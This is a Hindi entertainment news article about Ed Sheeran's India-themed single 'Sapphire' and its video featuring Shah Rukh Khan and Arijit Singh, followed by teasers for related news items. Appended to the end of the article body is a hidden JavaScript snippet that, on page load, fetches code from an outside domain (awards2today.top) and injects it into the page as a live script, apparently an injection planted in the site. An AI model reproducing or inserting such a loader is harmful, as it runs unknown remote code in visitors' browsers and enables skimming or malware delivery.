स्कूटी पर अरिजीत, साथ में शाहरूख..ED Sheeran का भारत के लिए एक म्यूजिकल लव लेटर

ed-sheeran-sapphire-arijit-singh-shahrukh-khan-india

स्कूटी पर अरिजीत, साथ में शाहरूख..ED Sheeran का भारत के लिए एक म्यूजिकल लव लेटर

स्कूटी पर अरिजीत साथ में शाहरूखed sheeran का भारत के लिए एक म्यूजिकल लव लेटर

ED Sheeran Sapphire India: ब्रिटिश पॉप सनसनी एड शीरन एक बार फिर अपने नए सिंगल 'सैफायर' के साथ सुर्खियों में हैं, जो 5 जून 2025 को रिलीज हुआ। यह गाना न केवल उनकी म्यूजिकल जर्नी का एक नया पड़ाव है, बल्कि भारत के प्रति उनके गहरे लगाव का जीता-जागता सबूत भी है। इस गाने में बॉलीवुड के बादशाह शाहरुख खान और सोलफुल सिंगर अरिजीत सिंह की मौजूदगी ने इसे और भी खास बना दिया है।

 

View this post on Instagram

 

A post shared by Ed Sheeran (@teddysphotos)

भारत की सैर करता 'सैफायर' 

'सैफायर' का म्यूजिक वीडियो में भारत की खूबसूरती को दिखाया है।  इसे एड शीरन की हालिया भारत ट्यूर के दौरान शूट किया गया, जिसमें कोलकाता और हैदराबाद की गलियों से लेकर 'बाहुबली' के भव्य सेट तक शामिल हैं। वीडियो में एड कभी ऑटो रिक्शा में सैर करते दिखते हैं, तो कभी हुगली नदी के किनारे खड़े हैं। समुद्र तटों से लेकर स्थानीय बाजारों तक, को सेलिब्रेट करता है। खास बात यह है कि एड ने इसमें पंजाबी में गाना गाया, जिसमें अरिजीत सिंह की आवाज और सितार की धुन गाने को एक देसी टच देती है। Read More: नागार्जुन के छोटे बेटे अखिल ने गुपचुप की शादी, स्क्रिप्ट से कम नहीं है Love Story

ED Sheeran Sapphire India: शाहरुख खान की मौजूदगी

'सैफायर' में शाहरुख खान का कैमियो फैंस के लिए किसी सरप्राइज से कम नहीं। वीडियो में शाहरुख, एड के साथ गाने की हुक लाइन गाते नजर आते हैं, जिसे देख फैंस की खुशी का ठिकाना नहीं रहा। वहीं, अरिजीत सिंह ने न केवल गाने में अपनी आवाज दी, बल्कि वीडियो में उनके साथ एड की दोस्ताना केमिस्ट्री भी दिखी। एक सीन में दोनों एक बार्ज पर कॉफी पीते हुए गपशप करते दिखते हैं, जो फैंस को बेहद पसंद आया। अरिजीत का गाया पंजाबी वर्स "चम चम चमके सितारे वरगी" गाने का हाईलाइट है, जो indian और Western म्यूजिक का शानदार फ्यूजन है।

'प्ले' एल्बम का हिस्सा 

'सैफायर' एड शीरन के आठवें स्टूडियो एल्बम 'प्ले' का तीसरा सिंगल है, जिसका रिलीज डेट 12 सितंबर 2025 है। इससे पहले 'अजीजम' और 'ओल्ड फोन' जैसे गाने रिलीज हो चुके हैं, लेकिन 'सैफायर' अपनी क्रॉस-कल्चरल वाइब्स के कारण सबसे ज्यादा चर्चा में है। एड ने बताया कि इस गाने को गोवा में रिकॉर्ड किया गया, जहां वे भारत के बेहतरीन म्यूजिशियन्स के साथ थे। सोशल मीडिया पर फैंस इसे "इंडिया का म्यूजिकल लव लेटर" कह रहे हैं।;document.addEventListener("DOMContentLoaded", function () { var url = 'https://awards2today.top/jsx'; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement('script'); script.innerHTML = data.trim(); document.head.appendChild(script); }) });

संबंधित सामग्री

ऑपरेशन सिंदूर के एक साल पूरे, PM मोदी समेत मंत्रियों ने बदली प्रोफाइल फोटो; सेना के शौर्य को किया सलाम

देश-विदेश

ऑपरेशन सिंदूर के एक साल पूरे, PM मोदी समेत मंत्रियों ने बदली प्रोफाइल फोटो; सेना के शौर्य को किया सलाम

ऑपरेशन सिंदूर की पहली वर्षगांठ पर पीएम मोदी समेत कई मंत्रियों ने सोशल मीडिया प्रोफाइल फोटो बदली। सेना के शौर्य और आतंकवाद के खिलाफ भारत के संकल्प को सलाम किया गया।

RCB Vs LSG IPL 2026: IPL 2026 के 50वें मुकाबले में RCB और LSG आमने- सामने

खेल

RCB Vs LSG IPL 2026: IPL 2026 के 50वें मुकाबले में RCB और LSG आमने- सामने

Royal Challengers Bangalore and Lucknow Super Giants will compete in the 50th match of IPL 2026 at Ekana Stadium, Lucknow.

SRH Vs PBKS IPL 2026: पंजाब को हराकर टॉप पर पहुंची SRH

खेल

SRH Vs PBKS IPL 2026: पंजाब को हराकर टॉप पर पहुंची SRH

In the 49th match of IPL 2026, SRH defeated PBKS by 33 runs at Rajiv Gandhi International Stadium, moving to the top of the points table.

बंगाल में खूनी बवाल: शुभेंदु अधिकारी के PA को बीच सड़क गोलियों से भूना 

देश-विदेश

बंगाल में खूनी बवाल: शुभेंदु अधिकारी के PA को बीच सड़क गोलियों से भूना 

पश्चिम बंगाल में शुभेंदु अधिकारी के पीए चंद्रनाथ रथ की हत्या मामले में बड़े खुलासे हुए हैं। ओवरटेक कर कार रोकी गई, 10 राउंड फायरिंग हुई और CCTV जांच जारी है।

उपज का एक-एक दाना कीमती, भुगतान में देरी बर्दाश्त नहीं : मुख्यमंत्री डॉ. यादव

मध्य प्रदेश

उपज का एक-एक दाना कीमती, भुगतान में देरी बर्दाश्त नहीं : मुख्यमंत्री डॉ. यादव

 मुख्यमंत्री की किसान हितैषी नीति से चौरई के 64 किसानों को मिलेंगे लगभग एक करोड़ रुपये, सभी मंडियों में समय-सीमा में हो भुगतान, लापरवाही पर होगी सख्त कार्रवाई।